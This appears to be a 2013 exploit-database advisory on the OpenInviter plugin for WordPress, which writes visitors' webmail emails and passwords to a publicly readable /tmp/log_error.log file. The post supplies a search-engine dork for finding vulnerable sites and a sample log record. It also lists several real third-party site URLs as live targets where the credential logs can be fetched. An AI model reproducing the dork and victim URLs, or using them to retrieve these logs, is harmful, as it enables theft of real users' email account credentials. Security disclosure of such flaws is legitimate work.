########################################################## # Title : OpenInviter for WordPress Disclose User Information # Author : Ryuzaki Lawlet # Blog  : justryuz.blogspot.com / www.justryuz.com # E-mail : ryuzaki_l@y7mail.com / justryuz@facebook.com / justryuz@linuxmail.org # Date: Sat Jan 5/2013 (5.47 pm) # Vendor: http://wordpress.org/extend/plugins/openinviter-for-wordpress/ # Type : Web Apps # Tested on : Ubuntu / Windows XP # Dork ; inurl:/OpenInviter/tmp/ & inurl:/OpenInviter/tmp/log_error.log ########################################################## ----> #--info about OpenInviter for WordPress: >> Allow your visitors to invite their contacts from Yahoo!, GMail, AOL, Hotmail and other providers to your blog. Exploit: every user who logs in through this plugin gets a log record containing their email/password in the log_error file in the /tmp/ folder, and this log_error file discloses user information such as the email/password of their main mail account at Yahoo!, GMail, AOL, Hotmail and other providers. Example: [Year-month-day TIME] Local Debugger ----------DETAILS START---------- TRANSPORT: curl SERVICE: hotmail USER: victim@hotmail.com PASSWORD: ********* STEPS:     initial_get :         URL: http://login.live.com/login.srf?id=2         METHOD: GET         RESPONSE: OK     login_post :         URL: https://login.live.com/ppsecure/post.srf?id=2&bk=1314918491         METHOD: POST         ELEMENTS:             PPSX=Passp             PwdPad=             type=             PPFT=ChJRMpJiZhTe4Z7X92sBFddI9M!tmfKtPFtflhAC1VeryloMgt7rVPjP6ADrF!rndQQRq2ZVzysXjuyAYS9NjIe5*OllJx!vK7xAU3ym0ZdKQakLQgOgVnTZn8N81jKUy00TaxC8acf!uMH!sH56Y3GputfpqyBGW1FwrNVFXvun2MwBOPUKs!mWshzl0CYxwuMyGG*0vC1yLpHNXZEgrN!7wezhHpooEH3Sox*ThDrs             LoginOptions=3             login=victim@hotmail.com             passwd=***********         RESPONSE: OK     first_redirect :         URL: 
http://www.hotmail.msn.com/cgi-bin/sbox?t=9ikSpGCZTCYwY3a5CuPibCZnDn3GN5e*OrIs5kzbdHvcgNQ610Cgps14x5lTVph*hWu0fdotwA4j7zZubNVU36uA0ag!cfBdMn9G!BcYoxELnC1Uue0m96tijFO744DPJy&p=9TSxWDG0OAapNedMZ1LMYVhOLboD26IovMvgl2rTjU5pSHOcPyYJWT8vdIcp7B0!9asl4R0AUTIXJnwxk7tqrNDQFa8jRiV7P3DsXuMRz4HrkvEmy3oX8VvFMHMhrOm0vX6C3OSrjvPpmuluxkGCAviJzvHjPDhT4YhLdhpNW0U4mVYL7rTKlTayPOqjGXnEAA&mkt=EN-US&lc=1033&id=2         METHOD: GET         RESPONSE: FAILED ----------DETAILS END---------- #--Demo / live http://brsinfo.com/cares/wp-content/plugins/contest/OpenInviter/tmp/log_error.log http://www.123employee.com/wp-content/plugins/contest/OpenInviter/tmp/log_error.log http://realestatemegalopolis.com/in/wp-content/plugins/contest/OpenInviter/tmp/log_error.log http://www.learnpassion.net/lp/wp-content/plugins/contest/OpenInviter/tmp/log_error.log and many at google :v.... #----> Screenshot / Preview http://i.imgur.com/tKILJ.png